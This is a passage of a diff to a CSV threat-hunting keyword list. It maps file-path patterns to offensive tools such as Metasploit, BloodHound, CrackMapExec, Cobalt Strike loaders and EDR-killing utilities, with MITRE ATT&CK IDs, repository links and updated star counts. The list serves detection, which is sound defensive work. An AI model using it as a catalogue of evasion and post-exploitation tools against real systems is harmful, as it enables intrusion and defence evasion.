T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/BitsArbitraryFileMove*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/BitsArbitraryFileMove*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/bittorrent-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" @@ -2862,18 +2868,18 @@ "*/blob/main/write_anything.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" "*/BlockEtw.git*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*/BlockOpenHandle.git*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" -"*/bloodhound.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/bloodhound.py*","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/bloodhound/enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/bloodhound.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bloodhound.py*","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/bloodhound/enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*/bloodhound_domain.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/bloodhound_domaintrust.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/bloodhound_gpo.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/bloodhound_object.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/bloodhound_ou.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/bloodhound_schema.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*/bloodhound-data*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/bloodhound-data*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*/bloodhound-quickwin.git*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" -"*/bloodyAD.git*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z" +"*/bloodyAD.git*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" "*/bluscreenofjeff/*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*/Bo0oM*","offensive_tool_keyword","Github Username","Github username known for exploitation tools. Web application security researcher. Current Location: Moscow. Russia","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Bo0oM","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bof.cpp *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" @@ -2900,13 +2906,13 @@ "*/bof-vs-template/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof-vs-template/*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/boko.py*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" -"*/boku7/spawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/boku7/spawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/boku7/whereami/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" -"*/BokuLoader.c*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*/BokuLoader.h*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*/BokuLoader/*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader.c*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*/BokuLoader.h*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 